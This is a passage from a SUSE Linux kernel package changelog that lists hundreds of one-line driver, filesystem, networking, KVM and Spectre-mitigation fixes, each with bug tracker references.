(bnc#1012382).\n - can: flex_can: Correct the checking for frame length in\n 
flexcan_start_xmit() (bnc#1012382).\n - cdrom: turn off autoclose by default (bsc#1080813).\n - cfg80211: check dev_set_name() return value (bnc#1012382).\n - cfg80211: fix cfg80211_beacon_dup (bnc#1012382).\n - cifs: dump IPC tcon in debug proc file (bsc#1071306).\n - cifs: Fix autonegotiate security settings mismatch (bnc#1012382).\n - cifs: Fix missing put_xid in cifs_file_strict_mmap (bnc#1012382).\n - cifs: make IPC a regular tcon (bsc#1071306).\n - cifs: use tcon_ipc instead of use_ipc parameter of SMB2_ioctl\n (bsc#1071306).\n - cifs: zero sensitive data when freeing (bnc#1012382).\n - clk: fix a panic error caused by accessing NULL pointer (bnc#1012382).\n - console/dummy: leave .con_font_get set to NULL (bnc#1012382).\n - cpufreq: Add Loongson machine dependencies (bnc#1012382).\n - crypto: aesni - handle zero length dst buffer (bnc#1012382).\n - crypto: af_alg - whitelist mask and type (bnc#1012382).\n - crypto: caam - fix endless loop when DECO acquire fails (bnc#1012382).\n - crypto: cryptd - pass through absence of ->setkey() (bnc#1012382).\n - crypto: hash - introduce crypto_hash_alg_has_setkey() (bnc#1012382).\n - crypto: poly1305 - remove ->setkey() method (bnc#1012382).\n - crypto: s5p-sss - Fix kernel Oops in AES-ECB mode (bnc#1012382).\n - crypto: tcrypt - fix S/G table for test_aead_speed() (bnc#1012382).\n - crypto: x86/twofish-3way - Fix %rbp usage (bnc#1012382).\n - cw1200: fix bogus maybe-uninitialized warning (bnc#1012382).\n - dccp: limit sk_filter trim to payload (bsc#1042286).\n - dell-wmi, dell-laptop: depends DMI (bnc#1012382).\n - dlm: fix double list_del() (bsc#1082795).\n - dlm: fix NULL pointer dereference in send_to_sock() (bsc#1082795).\n - dmaengine: at_hdmac: fix potential NULL pointer dereference in\n atc_prep_dma_interleaved (bnc#1012382).\n - dmaengine: dmatest: fix container_of member in dmatest_callback\n (bnc#1012382).\n - dmaengine: ioat: Fix error handling path (bnc#1012382).\n - dmaengine: jz4740: disable/unprepare clk 
if probe fails (bnc#1012382).\n - dmaengine: zx: fix build warning (bnc#1012382).\n - dm: correctly handle chained bios in dec_pending() (bnc#1012382).\n - dn_getsockoptdecnet: move nf_{get/set}sockopt outside sock lock\n (bnc#1012382).\n - do not put symlink bodies in pagecache into highmem (bnc#1012382).\n - dpt_i2o: fix build warning (bnc#1012382).\n - driver-core: use 'dev' argument in dev_dbg_ratelimited stub\n (bnc#1012382).\n - drivers/net: fix eisa_driver probe section mismatch (bnc#1012382).\n - drm/amdgpu: Avoid leaking PM domain on driver unbind (v2) (bnc#1012382).\n - drm/amdgpu: Fix SDMA load/unload sequence on HWS disabled mode\n (bnc#1012382).\n - drm/amdkfd: Fix SDMA oversubsription handling (bnc#1012382).\n - drm/amdkfd: Fix SDMA ring buffer size calculation (bnc#1012382).\n - drm/armada: fix leak of crtc structure (bnc#1012382).\n - drm/edid: Add 6 bpc quirk for CPT panel in Asus UX303LA (bnc#1012382).\n - drm/gma500: remove helper function (bnc#1012382).\n - drm/gma500: Sanity-check pipe index (bnc#1012382).\n - drm/nouveau: hide gcc-4.9 -Wmaybe-uninitialized (bnc#1012382).\n - drm/nouveau/pci: do a msi rearm on init (bnc#1012382).\n - drm/radeon: adjust tested variable (bnc#1012382).\n - drm: rcar-du: Fix race condition when disabling planes at CRTC stop\n (bnc#1012382).\n - drm: rcar-du: Use the VBK interrupt for vblank events (bnc#1012382).\n - drm: Require __GFP_NOFAIL for the legacy drm_modeset_lock_all\n (bnc#1012382).\n - drm/ttm: check the return value of kzalloc (bnc#1012382).\n - drm/vmwgfx: use *_32_bits() macros (bnc#1012382).\n - e1000: fix disabling already-disabled warning (bnc#1012382).\n - edac, octeon: Fix an uninitialized variable warning (bnc#1012382).\n - em28xx: only use mt9v011 if camera support is enabled (bnc#1012382).\n - enable DST_CACHE in non-vanilla configs except s390x/zfcpdump\n - ext4: correct documentation for grpid mount option (bnc#1012382).\n - ext4: do not unnecessarily allocate buffer in recently_deleted()\n 
(bsc#1080344).\n - ext4: Fix data exposure after failed AIO DIO (bsc#1069135 bsc#1082864).\n - ext4: save error to disk in __ext4_grp_locked_error() (bnc#1012382).\n - f2fs: fix a bug caused by NULL extent tree (bsc#1082478). While this fs\n is not supported by SLE it affects opensuse users so let's add it to our\n kernel for opensuse merging.\n - fbdev: auo_k190x: avoid unused function warnings (bnc#1012382).\n - fbdev: s6e8ax0: avoid unused function warnings (bnc#1012382).\n - fbdev: sis: enforce selection of at least one backend (bnc#1012382).\n - fbdev: sm712fb: avoid unused function warnings (bnc#1012382).\n - flow_dissector: Check skb for VLAN only if skb specified (bsc#1042286).\n - flow_dissector: fix vlan tag handling (bsc#1042286).\n - flow_dissector: For stripped vlan, get vlan info from skb->vlan_tci\n (bsc#1042286).\n - ftrace: Remove incorrect setting of glob search field (bnc#1012382).\n - geneve: fix populating tclass in geneve_get_v6_dst (bsc#1042286).\n - genirq/msi: Add stubs for get_cached_msi_msg/pci_write_msi_msg\n (bnc#1012382).\n - genksyms: Fix segfault with invalid declarations (bnc#1012382).\n - gianfar: fix a flooded alignment reports because of padding issue\n (bnc#1012382).\n - go7007: add MEDIA_CAMERA_SUPPORT dependency (bnc#1012382).\n - gpio: ath79: add missing MODULE_DESCRIPTION/LICENSE (bnc#1012382).\n - gpio: intel-mid: Fix build warning when !CONFIG_PM (bnc#1012382).\n - gpio: iop: add missing MODULE_DESCRIPTION/AUTHOR/LICENSE (bnc#1012382).\n - gpio: xgene: mark PM functions as __maybe_unused (bnc#1012382).\n - grace: replace BUG_ON by WARN_ONCE in exit_net hook (bnc#1012382).\n - gre: build header correctly for collect metadata tunnels (bsc#1042286).\n - gre: do not assign header_ops in collect metadata mode (bsc#1042286).\n - gre: do not keep the GRE header around in collect medata mode\n (bsc#1042286).\n - gre: reject GUE and FOU in collect metadata mode (bsc#1042286).\n - hdpvr: hide unused variable (bnc#1012382).\n - hid: 
quirks: Fix keyboard + touchpad on Toshiba Click Mini not working\n (bnc#1012382).\n - hippi: Fix a Fix a possible sleep-in-atomic bug in rr_close\n (bnc#1012382).\n - hrtimer: Ensure POSIX compliance (relative CLOCK_REALTIME hrtimers)\n (bnc#1012382).\n - hwmon: (pmbus) Use 64bit math for DIRECT format values (bnc#1012382).\n - hwrng: exynos - use __maybe_unused to hide pm functions (bnc#1012382).\n - i2c: remove __init from i2c_register_board_info() (bnc#1012382).\n - ib/ipoib: Fix race condition in neigh creation (bnc#1012382).\n - ib/mlx4: Fix incorrectly releasing steerable UD QPs when have only ETH\n ports (bnc#1012382).\n - ib/mlx4: Fix mlx4_ib_alloc_mr error flow (bnc#1012382).\n - ibmvnic: Account for VLAN header length in TX buffers (bsc#1085239).\n - ibmvnic: Account for VLAN tag in L2 Header descriptor (bsc#1085239).\n - ibmvnic: Allocate max queues stats buffers (bsc#1081498).\n - ibmvnic: Allocate statistics buffers during probe (bsc#1082993).\n - ibmvnic: Check for NULL skb's in NAPI poll routine (bsc#1081134,\n git-fixes).\n - ibmvnic: Clean RX pool buffers during device close (bsc#1081134).\n - ibmvnic: Clean up device close (bsc#1084610).\n - ibmvnic: Correct goto target for tx irq initialization failure\n (bsc#1082223).\n - ibmvnic: Do not attempt to login if RX or TX queues are not allocated\n (bsc#1082993).\n - ibmvnic: Do not disable device during failover or partition migration\n (bsc#1084610).\n - ibmvnic: Ensure that buffers are NULL after free (bsc#1080014).\n - ibmvnic: Fix early release of login buffer (bsc#1081134, git-fixes).\n - ibmvnic: fix empty firmware version and errors cleanup (bsc#1079038).\n - ibmvnic: fix firmware version when no firmware level has been provided\n by the VIOS server (bsc#1079038).\n - ibmvnic: Fix login buffer memory leaks (bsc#1081134).\n - ibmvnic: Fix NAPI structures memory leak (bsc#1081134).\n - ibmvnic: Fix recent errata commit (bsc#1085239).\n - ibmvnic: Fix rx queue cleanup for non-fatal resets 
(bsc#1080014).\n - ibmvnic: Fix TX descriptor tracking again (bsc#1082993).\n - ibmvnic: Fix TX descriptor tracking (bsc#1081491).\n - ibmvnic: Free and re-allocate scrqs when tx/rx scrqs change\n (bsc#1081498).\n - ibmvnic: Free RX socket buffer in case of adapter error (bsc#1081134).\n - ibmvnic: Generalize TX pool structure (bsc#1085224).\n - ibmvnic: Handle TSO backing device errata (bsc#1085239).\n - ibmvnic: Harden TX/RX pool cleaning (bsc#1082993).\n - ibmvnic: Improve TX buffer accounting (bsc#1085224).\n - ibmvnic: Keep track of supplementary TX descriptors (bsc#1081491).\n - ibmvnic: Make napi usage dynamic (bsc#1081498).\n - ibmvnic: Move active sub-crq count settings (bsc#1081498).\n - ibmvnic: Pad small packets to minimum MTU size (bsc#1085239).\n - ibmvnic: queue reset when CRQ gets closed during reset (bsc#1080263).\n - ibmvnic: Remove skb->protocol checks in ibmvnic_xmit (bsc#1080384).\n - ibmvnic: Rename active queue count variables (bsc#1081498).\n - ibmvnic: Reorganize device close (bsc#1084610).\n - ibmvnic: Report queue stops and restarts as debug output (bsc#1082993).\n - ibmvnic: Reset long term map ID counter (bsc#1080364).\n - ibmvnic: Split counters for scrq/pools/napi (bsc#1082223).\n - ibmvnic: Update and clean up reset TX pool routine (bsc#1085224).\n - ibmvnic: Update release RX pool routine (bsc#1085224).\n - ibmvnic: Update TX and TX completion routines (bsc#1085224).\n - ibmvnic: Update TX pool initialization routine (bsc#1085224).\n - ibmvnic: Wait until reset is complete to set carrier on (bsc#1081134).\n - idle: i7300: add PCI dependency (bnc#1012382).\n - igb: Free IRQs when device is hotplugged (bnc#1012382).\n - iio: adc: axp288: remove redundant duplicate const on\n axp288_adc_channels (bnc#1012382).\n - iio: adis_lib: Initialize trigger before requesting interrupt\n (bnc#1012382).\n - iio: buffer: check if a buffer has been set up when poll is called\n (bnc#1012382).\n - input: tca8418_keypad - hide gcc-4.9 
-Wmaybe-uninitialized warning\n (bnc#1012382).\n - input: tca8418_keypad - remove double read of key event register\n (git-fixes).\n - iommu/amd: Add align parameter to alloc_irq_index() (bsc#975772).\n - iommu/amd: Enforce alignment for MSI IRQs (bsc#975772).\n - iommu/amd: Fix alloc_irq_index() increment (bsc#975772).\n - iommu/vt-d: Use domain instead of cache fetching (bsc#975772).\n - ip6mr: fix stale iterator (bnc#1012382).\n - ipc/msg: introduce msgctl(MSG_STAT_ANY) (bsc#1072689).\n - ipc/sem: introduce semctl(SEM_STAT_ANY) (bsc#1072689).\n - ipc/shm: introduce shmctl(SHM_STAT_ANY) (bsc#1072689).\n - ip_tunnel: fix preempt warning in ip tunnel creation/updating\n (bnc#1012382).\n - ip_tunnel: replace dst_cache with generic implementation (bnc#1012382).\n - ipv4: allow local fragmentation in ip_finish_output_gso() (bsc#1042286).\n - ipv4: fix checksum annotation in udp4_csum_init (bsc#1042286).\n - ipv4: ipconfig: avoid unused ic_proto_used symbol (bnc#1012382).\n - ipv4: update comment to document GSO fragmentation cases (bsc#1042286).\n - ipv6: datagram: Refactor dst lookup and update codes to a new function\n (bsc#1042286).\n - ipv6: datagram: Refactor flowi6 init codes to a new function\n (bsc#1042286).\n - ipv6: datagram: Update dst cache of a connected datagram sk during pmtu\n update (bsc#1042286).\n - ipv6: fix checksum annotation in udp6_csum_init (bsc#1042286).\n - ipv6: icmp6: Allow icmp messages to be looped back (bnc#1012382).\n - ipv6/ila: fix nlsize calculation for lwtunnel (bsc#1042286).\n - ipv6: remove unused in6_addr struct (bsc#1042286).\n - ipv6: tcp: fix endianness annotation in tcp_v6_send_response\n (bsc#1042286).\n - ipv6: udp: Do a route lookup and update during release_cb (bsc#1042286).\n - ipvlan: Add the skb->mark as flow4's member to lookup route\n (bnc#1012382).\n - ipvlan: fix multicast processing (bsc#1042286).\n - ipvlan: fix various issues in ipvlan_process_multicast() (bsc#1042286).\n - irqchip/gic-v3: Use wmb() instead of 
smb_wmb() in gic_raise_softirq()\n (bnc#1012382).\n - isdn: eicon: reduce stack size of sig_ind function (bnc#1012382).\n - isdn: icn: remove a #warning (bnc#1012382).\n - isdn: sc: work around type mismatch warning (bnc#1012382).\n - jffs2: Fix use-after-free bug in jffs2_iget()'s error handling path\n (git-fixes).\n - kABI: protect struct cpuinfo_x86 (kabi).\n - kABI: protect struct ip_tunnel and reintroduce ip_tunnel_dst_reset_all\n (kabi).\n - kABI: reintroduce crypto_poly1305_setkey (kabi).\n - kabi: restore kabi after "net: replace dst_cache ip6_tunnel\n implementation with the generic one" (bsc#1082897).\n - kabi: restore nft_set_elem_destroy() signature (bsc#1042286).\n - kabi: restore rhashtable_insert_slow() signature (bsc#1042286).\n - kabi/severities: add __x86_indirect_thunk_rsp\n - kabi/severities: as per bsc#1068569 we can ignore XFS kabi The gods have\n spoken, let there be light.\n - kabi: uninline sk_receive_skb() (bsc#1042286).\n - kaiser: fix compile error without vsyscall (bnc#1012382).\n - kaiser: fix intel_bts perf crashes (bnc#1012382).\n - kasan: rework Kconfig settings (bnc#1012382).\n - kernel/async.c: revert "async: simplify lowest_in_progress()"\n (bnc#1012382).\n - kernel: fix rwlock implementation (bnc#1080360, LTC#164371).\n - kernfs: fix regression in kernfs_fop_write caused by wrong type\n (bnc#1012382).\n - keys: encrypted: fix buffer overread in valid_master_desc()\n (bnc#1012382).\n - kmemleak: add scheduling point to kmemleak_scan() (bnc#1012382).\n - kvm: add X86_LOCAL_APIC dependency (bnc#1012382).\n - kvm: arm/arm64: Check pagesize when allocating a hugepage at Stage 2\n (bsc#1079029).\n - kvm: nVMX: Fix kernel panics induced by illegal INVEPT/INVVPID types\n (bnc#1012382).\n - kvm: nVMX: Fix races when sending nested PI while dest enters/leaves L2\n (bnc#1012382).\n - kvm: nVMX: invvpid handling improvements (bnc#1012382).\n - kvm: nVMX: kmap() can't fail (bnc#1012382).\n - kvm: nVMX: vmx_complete_nested_posted_interrupt() 
can't fail\n (bnc#1012382).\n - kvm: PPC: Book3S PR: Fix svcpu copying with preemption enabled\n (bsc#1066223).\n - kvm: VMX: clean up declaration of VPID/EPT invalidation types\n (bnc#1012382).\n - kvm: VMX: Fix rflags cache during vCPU reset (bnc#1012382).\n - kvm: VMX: Make indirect call speculation safe (bnc#1012382).\n - kvm: x86: Do not re-execute instruction when not passing CR2 value\n (bnc#1012382).\n - kvm: x86: emulator: Return to user-mode on L1 CPL=0 emulation failure\n (bnc#1012382).\n - kvm: x86: fix escape of guest dr6 to the host (bnc#1012382).\n - kvm: X86: Fix operand/address-size during instruction decoding\n (bnc#1012382).\n - kvm: x86: ioapic: Clear Remote IRR when entry is switched to\n edge-triggered (bnc#1012382).\n - kvm: x86: ioapic: Fix level-triggered EOI and IOAPIC reconfigure race\n (bnc#1012382).\n - kvm: x86: ioapic: Preserve read-only values in the redirection table\n (bnc#1012382).\n - kvm: x86: Make indirect calls in emulator speculation safe (bnc#1012382).\n - kvm/x86: Reduce retpoline performance impact in\n slot_handle_level_range(), by always inlining iterator helper methods\n (bnc#1012382).\n - l2tp: fix use-after-free during module unload (bsc#1042286).\n - led: core: Fix brightness setting when setting delay_off=0 (bnc#1012382).\n - leds: do not overflow sysfs buffer in led_trigger_show (bsc#1080464).\n - lib/mpi: Fix umul_ppmm() for MIPS64r6 (bnc#1012382).\n - livepatch: introduce shadow variable API (bsc#1082299 fate#313296).\n Shadow variables support.\n - livepatch: __kgr_shadow_get_or_alloc() is local to shadow.c (bsc#1082299\n fate#313296). 
Shadow variables support.\n - lockd: fix "list_add double add" caused by legacy signal interface\n (bnc#1012382).\n - loop: fix concurrent lo_open/lo_release (bnc#1012382).\n - mac80211: fix the update of path metric for RANN frame (bnc#1012382).\n - mac80211: mesh: drop frames appearing to be from us (bnc#1012382).\n - Make DST_CACHE a silent config option (bnc#1012382).\n - mdio-sun4i: Fix a memory leak (bnc#1012382).\n - md/raid1: Use a new variable to count flighting sync\n requests(bsc#1078609)\n - media: cxusb, dib0700: ignore XC2028_I2C_FLUSH (bnc#1012382).\n - media: dvb-usb-v2: lmedm04: Improve logic checking of warm start\n (bnc#1012382).\n - media: dvb-usb-v2: lmedm04: move ts2020 attach to dm04_lme2510_tuner\n (bnc#1012382).\n - media: r820t: fix r820t_write_reg for KASAN (bnc#1012382).\n - media: s5k6aa: describe some function parameters (bnc#1012382).\n - media: soc_camera: soc_scale_crop: add missing\n MODULE_DESCRIPTION/AUTHOR/LICENSE (bnc#1012382).\n - media: ts2020: avoid integer overflows on 32 bit machines (bnc#1012382).\n - media: usbtv: add a new usbid (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: add missing VIDIOC_PREPARE_BUF\n (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: avoid sizeof(type) (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: copy clip list in put_v4l2_window32\n (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: copy m.userptr in put_v4l2_plane32\n (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: do not copy back the result for certain\n errors (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: drop pr_info for unknown buffer type\n (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: fix ctrl_is_pointer (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: fix the indentation (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: make ctrl_is_pointer work for subdevs\n (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: move 'helper' functions to\n __get/put_v4l2_format32 (bnc#1012382).\n - media: v4l2-compat-ioctl32: Copy 
v4l2_window->global_alpha (bnc#1012382).\n - media: v4l2-compat-ioctl32.c: refactor compat ioctl32 logic\n (bnc#1012382).\n - media: v4l2-ioctl.c: do not copy back the result for -ENOTTY\n (bnc#1012382).\n - mips: Implement __multi3 for GCC7 MIPS64r6 builds (bnc#1012382).\n - mmc: bcm2835: Do not overwrite max frequency unconditionally\n (bsc#983145, git-fixes).\n - mm/early_ioremap: Fix boot hang with earlyprintk=efi,keep (bnc#1012382).\n - mm: hide a #warning for COMPILE_TEST (bnc#1012382).\n - mm/kmemleak.c: make cond_resched() rate-limiting more efficient\n (git-fixes).\n - mm: pin address_space before dereferencing it while isolating an LRU\n page (bnc#1081500).\n - mm,vmscan: Make unregister_shrinker() no-op if register_shrinker()\n failed (bnc#1012382).\n - mn10300/misalignment: Use SIGSEGV SEGV_MAPERR to report a failed user\n copy (bnc#1012382).\n - modsign: hide openssl output in silent builds (bnc#1012382).\n - module/retpoline: Warn about missing retpoline in module (bnc#1012382).\n - mpt3sas: Do not mark fw_event workqueue as WQ_MEM_RECLAIM (bsc#1078583).\n - mptfusion: hide unused seq_mpt_print_ioc_summary function (bnc#1012382).\n - mtd: cfi: convert inline functions to macros (bnc#1012382).\n - mtd: cfi: enforce valid geometry configuration (bnc#1012382).\n - mtd: ichxrom: maybe-uninitialized with gcc-4.9 (bnc#1012382).\n - mtd: maps: add __init attribute (bnc#1012382).\n - mtd: nand: brcmnand: Disable prefetch by default (bnc#1012382).\n - mtd: nand: denali_pci: add missing MODULE_DESCRIPTION/AUTHOR/LICENSE\n (bnc#1012382).\n - mtd: nand: Fix nand_do_read_oob() return value (bnc#1012382).\n - mtd: nand: gpmi: Fix failure when a erased page has a bitflip at BBM\n (bnc#1012382).\n - mtd: nand: sunxi: Fix ECC strength choice (bnc#1012382).\n - mtd: sh_flctl: pass FIFO as physical address (bnc#1012382).\n - mvpp2: fix multicast address filter (bnc#1012382).\n - ncpfs: fix unused variable warning (bnc#1012382).\n - ncr5380: shut up gcc indentation 
warning (bnc#1012382).\n - net: add dst_cache support (bnc#1012382).\n - net: arc_emac: fix arc_emac_rx() error paths (bnc#1012382).\n - net: avoid skb_warn_bad_offload on IS_ERR (bnc#1012382).\n - net: cdc_ncm: initialize drvflags before usage (bnc#1012382).\n - net: dst_cache_per_cpu_dst_set() can be static (bnc#1012382).\n - net: ena: add detection and recovery mechanism for handling\n missed/misrouted MSI-X (bsc#1083548).\n - net: ena: add new admin define for future support of IPv6 RSS\n (bsc#1083548).\n - net: ena: add power management ops to the ENA driver (bsc#1083548).\n - net: ena: add statistics for missed tx packets (bsc#1083548).\n - net: ena: fix error handling in ena_down() sequence (bsc#1083548).\n - net: ena: fix race condition between device reset and link up setup\n (bsc#1083548).\n - net: ena: fix rare kernel crash when bar memory remap fails\n (bsc#1083548).\n - net: ena: fix wrong max Tx/Rx queues on ethtool (bsc#1083548).\n - net: ena: improve ENA driver boot time (bsc#1083548).\n - net: ena: increase ena driver version to 1.3.0 (bsc#1083548).\n - net: ena: increase ena driver version to 1.5.0 (bsc#1083548).\n - net: ena: reduce the severity of some printouts (bsc#1083548).\n - net: ena: remove legacy suspend suspend/resume support (bsc#1083548).\n - net: ena: Remove redundant unlikely() (bsc#1083548).\n - net: ena: unmask MSI-X only after device initialization is completed\n (bsc#1083548).\n - net: ethernet: xilinx: Mark XILINX_LL_TEMAC broken on 64-bit\n (bnc#1012382).\n - netfilter: drop outermost socket lock in getsockopt() (bnc#1012382).\n - netfilter: ebtables: CONFIG_COMPAT: do not trust userland offsets\n (bsc#1085107).\n - netfilter: ebtables: fix erroneous reject of last rule (bsc#1085107).\n - netfilter: ipt_CLUSTERIP: fix out-of-bounds accesses in\n clusterip_tg_check() (bnc#1012382).\n - netfilter: ipvs: avoid unused variable warnings (bnc#1012382).\n - netfilter: nf_queue: Make the queue_handler pernet (bnc#1012382).\n - 
netfilter: nf_tables: fix a wrong check to skip the inactive rules\n (bsc#1042286).\n - netfilter: nf_tables: fix inconsistent element expiration calculation\n (bsc#1042286).\n - netfilter: nf_tables: fix *leak* when expr clone fail (bsc#1042286).\n - netfilter: nf_tables: fix race when create new element in dynset\n (bsc#1042286).\n - netfilter: on sockopt() acquire sock lock only in the required scope\n (bnc#1012382).\n - netfilter: tee: select NF_DUP_IPV6 unconditionally (bsc#1042286).\n - netfilter: x_tables: avoid out-of-bounds reads in\n xt_request_find_{match|target} (bnc#1012382).\n - netfilter: x_tables: fix int overflow in xt_alloc_table_info()\n (bnc#1012382).\n - netfilter: xt_RATEEST: acquire xt_rateest_mutex for hash insert\n (bnc#1012382).\n - netfilter: xt_socket: fix transparent match for IPv6 request sockets\n (bsc#1042286).\n - net: gianfar_ptp: move set_fipers() to spinlock protecting area\n (bnc#1012382).\n - net: hp100: remove unnecessary #ifdefs (bnc#1012382).\n - net: igmp: add a missing rcu locking section (bnc#1012382).\n - net/ipv4: Introduce IPSKB_FRAG_SEGS bit to inet_skb_parm.flags\n (bsc#1042286).\n - netlink: fix nla_put_{u8,u16,u32} for KASAN (bnc#1012382).\n - net: replace dst_cache ip6_tunnel implementation with the generic one\n (bnc#1012382).\n - net_sched: red: Avoid devision by zero (bnc#1012382).\n - net_sched: red: Avoid illegal values (bnc#1012382).\n - net: vxlan: lwt: Fix vxlan local traffic (bsc#1042286).\n - net: vxlan: lwt: Use source ip address during route lookup (bsc#1042286).\n - nfs: Add a cond_resched() to nfs_commit_release_pages() (bsc#1077779).\n - nfs: commit direct writes even if they fail partially (bnc#1012382).\n - nfsd: check for use of the closed special stateid (bnc#1012382).\n - nfsd: CLOSE SHOULD return the invalid special stateid for NFSv4.x (x>0)\n (bnc#1012382).\n - nfsd: Ensure we check stateid validity in the seqid operation checks\n (bnc#1012382).\n - nfs: Do not convert nfs_idmap_cache_timeout 
to jiffies (git-fixes).\n - nfs: fix a deadlock in nfs client initialization (bsc#1074198).\n - nfs/pnfs: fix nfs_direct_req ref leak when i/o falls back to the mds\n (bnc#1012382).\n - nfs: reject request for id_legacy key without auxdata (bnc#1012382).\n - nfs: Trunking detection should handle ERESTARTSYS/EINTR (bsc#1074198).\n - nvme: Fix managing degraded controllers (bnc#1012382).\n - ocfs2: return error when we attempt to access a dirty bh in jbd2\n (bsc#1012829).\n - openvswitch: fix the incorrect flow action alloc size (bnc#1012382).\n - ovl: fix failure to fsync lower dir (bnc#1012382).\n - ovs/geneve: fix rtnl notifications on iface deletion (bsc#1042286).\n - ovs/gre: fix rtnl notifications on iface deletion (bsc#1042286).\n - ovs/gre,geneve: fix error path when creating an iface (bsc#1042286).\n - ovs/vxlan: fix rtnl notifications on iface deletion (bsc#1042286).\n - pci/ASPM: Do not retrain link if ASPM not possible (bnc#1071892).\n - pci: keystone: Fix interrupt-controller-node lookup (bnc#1012382).\n - perf bench numa: Fixup discontiguous/sparse numa nodes (bnc#1012382).\n - perf top: Fix window dimensions change handling (bnc#1012382).\n - perf/x86: Shut up false-positive -Wmaybe-uninitialized warning\n (bnc#1012382).\n - pinctrl: sunxi: Fix A80 interrupt pin bank (bnc#1012382).\n - pipe: cap initial pipe capacity according to pipe-max-size limit\n (bsc#1045330).\n - pktcdvd: Fix pkt_setup_dev() error path (bnc#1012382).\n - platform/x86: intel_mid_thermal: Fix suspend handlers unused warning\n (bnc#1012382).\n - PM / devfreq: Propagate error from devfreq_add_device() (bnc#1012382).\n - PM / wakeirq: Fix unbalanced IRQ enable for wakeirq (bsc#1031717).\n - posix-timer: Properly check sigevent->sigev_notify (bnc#1012382).\n - power: bq27xxx_battery: mark some symbols __maybe_unused (bnc#1012382).\n - powerpc/64: Fix flush_(d|i)cache_range() called from modules\n (FATE#315275 LTC#103998 bnc#1012382 bnc#863764).\n - powerpc/64s: Fix RFI flush 
dependency on HARDLOCKUP_DETECTOR\n (bnc#1012382).\n - powerpc/64s: Improve RFI L1-D cache flush fallback (bsc#1068032,\n bsc#1075087).\n - powerpc: Do not preempt_disable() in show_cpuinfo() (bsc#1066223).\n - powerpc/numa: Invalidate numa_cpu_lookup_table on cpu remove\n (bsc#1081512).\n - powerpc/perf: Fix oops when grouping different pmu events (bnc#1012382).\n - powerpc/powernv: Fix MCE handler to avoid trashing CR0/CR1 registers\n (bsc#1066223).\n - powerpc/powernv: Move IDLE_STATE_ENTER_SEQ macro to cpuidle.h\n (bsc#1066223).\n - powerpc/powernv: Support firmware disable of RFI flush (bsc#1068032,\n bsc#1075087).\n - powerpc/pseries: Support firmware disable of RFI flush (bsc#1068032,\n bsc#1075087).\n - powerpc: Simplify module TOC handling (bnc#1012382).\n - power: reset: zx-reboot: add missing MODULE_DESCRIPTION/AUTHOR/LICENSE\n (bnc#1012382).\n - profile: hide unused functions when !CONFIG_PROC_FS (bnc#1012382).\n - Provide a function to create a NUL-terminated string from unterminated\n data (bnc#1012382).\n - pwc: hide unused label (bnc#1012382).\n - qla2xxx: asynchronous pci probing (bsc#1034503).\n - qlcnic: fix deadlock bug (bnc#1012382).\n - r8169: fix RTL8168EP take too long to complete driver initialization\n (bnc#1012382).\n - RDMA/cma: Make sure that PSN is not over max allowed (bnc#1012382).\n - reiserfs: avoid a -Wmaybe-uninitialized warning (bnc#1012382).\n - Revert "Bluetooth: btusb: fix QCA Rome suspend/resume" (bnc#1012382).\n - Revert "bpf: avoid false sharing of map refcount with max_entries"\n (kabi).\n - Revert "netfilter: nf_queue: Make the queue_handler pernet" (kabi).\n - Revert "net: replace dst_cache ip6_tunnel implementation with the\n generic one" (kabi bnc#1082897).\n - Revert "power: bq27xxx_battery: Remove unneeded dependency in Kconfig"\n (bnc#1012382).\n - Revert "powerpc: Simplify module TOC handling" (kabi).\n - Revert "x86/entry/64: Separate cpu_current_top_of_stack from TSS.sp0"\n This reverts commit 
89ef3e2aec59362edf7b1cd1c48acc81cd74e319.\n - Revert "x86/entry/64: Use a per-CPU trampoline stack for IDT entries"\n This reverts commit 5812bed1a96b27804bfd1eadbe3e263cb58aafdf.\n - rfi-flush: Move the logic to avoid a redo into the debugfs code\n (bsc#1068032, bsc#1075087).\n - rfi-flush: Switch to new linear fallback flush (bsc#1068032,\n bsc#1075087).\n - rhashtable: add rhashtable_lookup_get_insert_key() (bsc#1042286).\n - rtc-opal: Fix handling of firmware error codes, prevent busy loops\n (bnc#1012382).\n - rtlwifi: fix gcc-6 indentation warning (bnc#1012382).\n - rtlwifi: rtl8821ae: Fix connection lost problem correctly (bnc#1012382).\n - s390/dasd: fix handling of internal requests (bsc#1080809).\n - s390/dasd: fix wrongly assigned configuration data (bnc#1012382).\n - s390/dasd: prevent prefix I/O error (bnc#1012382).\n - s390: fix handling of -1 in set{,fs}[gu]id16 syscalls (bnc#1012382).\n - sched/rt: Up the root domain ref count when passing it around via IPIs\n (bnc#1012382).\n - sched/rt: Use container_of() to get root domain in\n rto_push_irq_work_func() (bnc#1012382).\n - scripts/kernel-doc: Do not fail with status != 0 if error encountered\n with -none (bnc#1012382).\n - scsi: aacraid: Prevent crash in case of free interrupt during scsi EH\n path (bnc#1012382).\n - scsi: advansys: fix build warning for PCI=n (bnc#1012382).\n - scsi: advansys: fix uninitialized data access (bnc#1012382).\n - scsi: csiostor: fix use after free in csio_hw_use_fwconfig()\n (bsc#1005776).\n - scsi: fdomain: drop fdomain_pci_tbl when built-in (bnc#1012382).\n - scsi: ibmvfc: fix misdefined reserved field in ibmvfc_fcp_rsp_info\n (bnc#1012382).\n - SCSI: initio: remove duplicate module device table (bnc#1012382).\n - scsi: mvumi: use __maybe_unused to hide pm functions (bnc#1012382).\n - scsi: qla2xxx: Fix abort command deadlock due to spinlock (FATE#320146,\n bsc#966328).\n - scsi: qla2xxx: Remove aborting ELS IOCB call issued as part of timeout\n (FATE#320146, 
